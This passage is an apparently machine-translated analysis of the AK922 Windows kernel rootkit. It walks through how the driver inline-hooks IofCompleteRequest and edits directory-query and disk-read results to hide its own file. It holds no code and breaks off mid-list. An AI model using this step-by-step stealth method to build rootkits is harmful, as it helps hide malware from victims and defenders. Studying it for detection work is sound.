Obtain nt first after the driver is loaded! The address of the IofCompleteRequest function. And locate the offset of the process name in kpeb. Then, the driver completes the following operations in sequence:
1. Pass nt! ObReferenceObjectByName open the disk drive DriverDisk and traverse all the device objects created by the drive, the driver saves the device object pointer created by Disk starting with ''dr ''and of the Disk device type. A maximum of eight device object pointers can be saved. The driver records the addresses of these device objects for future file hiding.
2. Create a device named DeviceAzyKit922. Currently, no symbolic link is created for the intercepted version, in later versions, you may create symbolic connections so that you can flexibly control the files to be hidden through user-State program control.
3. Set the callback for irp processing and the callback routine for detaching the driver.
4. Pass nt! Replace the first six bytes of the IofCompleteRequest function entry with push hook_IofCompleteRequest/ret to hook the function. This driver hides all files in nt! IofCompleteRequest is completed in the hook processing routine.
After completing the preceding operations, the driver saves its own driver object and device object pointer and returns the result to the I/o manager. When file I/o operations in the system are completed, the rootkit hook is activated and the following operations are completed in sequence:
1. Disable and block interruptions.
2. Modify the completed irp to hide the file.
3. Restore eflags and execute nt! The original entry code of IofCompleteRequest.
The following is an analysis of how rootkit can hide files:
Process 1. Determine whether the I/o request is IRP_MJ_DIRECTORY_CONTROL and MinorFunction is IRP_MN_QUERY_DIRECTORY. If not, it is transferred to the next process. If yes, it determines the type of the input request structure and finds the traversal result returned by the file system. If it is found that the traversal result of the file system is ''ak922. sys '', the result is modified (based on the position of the structure in the entire structure chain, determine whether to cut the chain or only disconnect one node ).
Process 2. perform the following operations in sequence:
1. If the I/o request is not IRP_MJ_READ, the rootkit will not be processed and will be returned directly.
2. Check whether the passed device object pointer is one of the eight previously saved Device objects created by DriverDisk,
<Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
